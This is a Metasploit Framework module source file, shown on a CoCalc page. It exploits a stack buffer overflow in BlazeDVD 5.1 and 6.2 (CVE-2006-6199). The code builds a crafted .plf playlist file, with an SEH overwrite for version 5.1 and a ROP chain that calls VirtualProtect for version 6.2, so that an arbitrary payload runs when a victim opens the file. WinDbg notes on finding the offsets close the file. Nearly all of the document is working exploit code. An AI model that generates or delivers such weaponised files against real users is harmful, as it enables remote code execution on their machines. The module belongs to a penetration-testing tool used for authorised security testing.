Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/blazedvd_plf.rb
19850 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When

18
          the application is used to open a specially crafted plf file,

19
          a buffer is overwritten allowing for the execution of arbitrary code.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'MC', # Developed target 5.1

24
          'Deepak Rathore', # ExploitDB PoC

25
          'Spencer McIntyre', # Developed taget 6.2

26
          'Ken Smith' # Developed target 6.2

27
        ],

28
        'References' => [

29
          [ 'CVE', '2006-6199' ],

30
          [ 'EDB', '32737' ],

31
          [ 'OSVDB', '30770' ],

32
          [ 'BID', '35918' ],

33
        ],

34
        'DefaultOptions' => {

35
          'EXITFUNC' => 'process',

36
          'AllowWin32SEH' => true

37
        },

38
        'Payload' => {

39
          'Space' => 750,

40
          'BadChars' => "\x00\x0a\x1a",

41
          'DisableNops' => true

42
        },

43


44
        'Platform' => 'win',

45
        'Targets' => [

46
          [

47
            'BlazeDVD 6.2',

48
            {

49
              'Payload' =>

50
                {

51
                  # Stackpivot => add esp,0xfffff254

52
                  'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"

53
                }

54
            }

55
          ],

56
          [

57
            'BlazeDVD 5.1',

58
            {

59
              'Ret' => 0x100101e7,

60
              'Payload' =>

61
                {

62
                  'EncoderType' => Msf::Encoder::Type::AlphanumUpper

63
                }

64
            }

65
          ],

66
        ],

67
        'Privileged' => false,

68
        'DisclosureDate' => '2009-08-03',

69
        'DefaultTarget' => 0,

70
        'Notes' => {

71
          'Stability' => [ CRASH_SERVICE_DOWN, ],

72
          'SideEffects' => [ SCREEN_EFFECTS, ],

73
          'Reliability' => UNKNOWN_RELIABILITY,

74
        }

75
      )

76
    )

77


78
    register_options(

79
      [

80
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),

81
      ]

82
    )

83
  end

84


85
  def rop_chain

86
    # rop chain generated with mona.py - www.corelan.be

87
    case target.name

88
    when 'BlazeDVD 6.2'

89
      rop_gadgets = [ ]

90
      # 0x6162e802 RETN (ROP NOP) [EPG.dll]

91
      rop_gadgets.fill(0x6162e802, 0..7)

92
      rop_gadgets += [

93
        0x61636758, # POP EAX # RETN [EPG.dll]

94
        0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]

95
        0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]

96
        0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]

97
        0x61628ea2, # POP EBP # RETN [EPG.dll]

98
        0x616069a1, # push esp # ret 0x04 [EPG.dll]

99
        0x61626702, # POP EAX # RETN [EPG.dll]

100
        0xfffffdff, # Value to negate, will become 0x00000201

101
        0x61627d9c, # NEG EAX # RETN [EPG.dll]

102
        0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]

103
        0x61629938, # POP EAX # RETN [EPG.dll]

104
        0xffffffc0, # Value to negate, will become 0x00000040

105
        0x61627d9c, # NEG EAX # RETN [EPG.dll]

106
        0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]

107
        0x61612f5a, # POP ECX # RETN [EPG.dll]

108
        0x100142ab, # &Writable location [SkinScrollBar.Dll]

109
        0x616313ac, # POP EDI # RETN [EPG.dll]

110
        0x6162e588, # RETN (ROP NOP) [EPG.dll]

111
        0x6162d638, # POP EAX # RETN [EPG.dll]

112
        0x90909090, # nop

113
        0x61620831, # PUSHAD # RETN [EPG.dll]

114
      ]

115
    end

116
    return rop_gadgets.flatten.pack("V*")

117
  end

118


119
  def exploit

120
    case target.name

121
    when 'BlazeDVD 5.1'

122
      plf = rand_text_alpha_upper(6024)

123
      plf[868, 8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V')

124
      plf[876, 12] = make_nops(12)

125
      plf[888, payload.encoded.length] = payload.encoded

126
    when 'BlazeDVD 6.2'

127
      plf = rand_text_alphanumeric(260)

128
      plf << rop_chain

129
      plf << payload.encoded

130
    end

131


132
    print_status("Creating '#{datastore['FILENAME']}' file ...")

133
    file_create(plf)

134
  end

135
end

136


137
=begin

138
0:000> !exchain

139
0012f2c8: 31644230

140
Invalid exception stack at 64423963

141
0:000> !pattern_offset 6024 0x31644230

142
[Byakugan] Control of 0x31644230 at offset 872.

143
0:000> !pattern_offset 6024 0x64423963

144
[Byakugan] Control of 0x64423963 at offset 868.

145
0:000> s -b 0x10000000 0x10018000 5e 59 c3

146
100012cd  5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00  ^Y.V.t$.W..V..<.

147
100101e7  5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24  ^Y........D$..L$

148
0:000> u 0x100012cd L3

149
skinscrollbar!SkinSB_ParentWndProc+0x1fd:

150
100012cd 5e              pop     esi

151
100012ce 59              pop     ecx

152
100012cf c3              ret

153
=end

154


155